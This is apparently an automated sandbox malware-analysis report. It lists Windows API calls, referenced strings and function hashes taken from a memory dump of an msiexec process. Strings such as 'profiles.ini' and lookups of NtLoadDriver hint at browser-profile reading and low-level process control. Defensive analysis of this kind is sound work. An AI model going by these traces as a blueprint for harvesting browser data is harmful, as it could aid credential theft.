                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                      • GetDC.USER32 ref: 004140E3
                                                                                                                                                      • wcslen.MSVCRT ref: 00414123
                                                                                                                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                      • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                      • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                      • String ID: %s:$EDIT$STATIC
                                                                                                                                                      • API String ID: 2080319088-3046471546
                                                                                                                                                      • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                      • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                      • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                      • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                      APIs
                                                                                                                                                      • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                      • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                      • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                      • memset.MSVCRT ref: 00413292
                                                                                                                                                      • memset.MSVCRT ref: 004132B4
                                                                                                                                                      • memset.MSVCRT ref: 004132CD
                                                                                                                                                      • memset.MSVCRT ref: 004132E1
                                                                                                                                                      • memset.MSVCRT ref: 004132FB
                                                                                                                                                      • memset.MSVCRT ref: 00413310
                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                      • memset.MSVCRT ref: 004133C0
                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                      • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                                      • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                      • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                      • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                      Strings
                                                                                                                                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                      • {Unknown}, xrefs: 004132A6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                      • API String ID: 4111938811-1819279800
                                                                                                                                                      • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                      • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                      • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                      • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                      • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                      • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 829165378-0
                                                                                                                                                      • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                      • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                      • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                      • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00404172
                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                      • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                      • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                      • memset.MSVCRT ref: 00404200
                                                                                                                                                      • memset.MSVCRT ref: 00404215
                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                      • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                      • memset.MSVCRT ref: 0040426E
                                                                                                                                                      • memset.MSVCRT ref: 004042CD
                                                                                                                                                      • memset.MSVCRT ref: 004042E2
                                                                                                                                                      • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                      • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                      • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                      • API String ID: 2454223109-1580313836
                                                                                                                                                      • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                      • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                      • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                      • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                      • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                      • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                      • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                      • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                      • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                                      • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                      • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                      • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                      • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                      • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                        • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                        • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                      • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                      • API String ID: 4054529287-3175352466
                                                                                                                                                      • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                      • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                      • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                      • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                      • API String ID: 3143752011-1996832678
                                                                                                                                                      • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                      • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                                      • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                      • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                      • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                      • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                      • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                      • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                      • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                      • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                      • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                                      • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                      • API String ID: 667068680-2887671607
                                                                                                                                                      • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                      • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                      • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                      • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                      • API String ID: 1607361635-601624466
                                                                                                                                                      • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                      • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                      • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                      • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                      • API String ID: 2000436516-3842416460
                                                                                                                                                      • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                      • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                      • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                      • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                        • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                        • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                        • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                      • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                      • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                      • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                      • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                      • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                      • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                      • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                      • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                      • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1043902810-0
                                                                                                                                                      • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                      • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                      • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                      • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                      APIs
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                                                      • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                      • wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                      • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                      • API String ID: 2899246560-1542517562
                                                                                                                                                      • Opcode ID: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                                                                                                      • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                      • Opcode Fuzzy Hash: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                                                                                                      • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                      • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                        • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                                                        • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                        • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                      • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                                                                      • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                      • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                      • API String ID: 3330709923-517860148
                                                                                                                                                      • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                      • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                      • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                      • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                        • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                      • memset.MSVCRT ref: 0040806A
                                                                                                                                                      • memset.MSVCRT ref: 0040807F
                                                                                                                                                      • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                                                                      • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                      • memset.MSVCRT ref: 004081E4
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
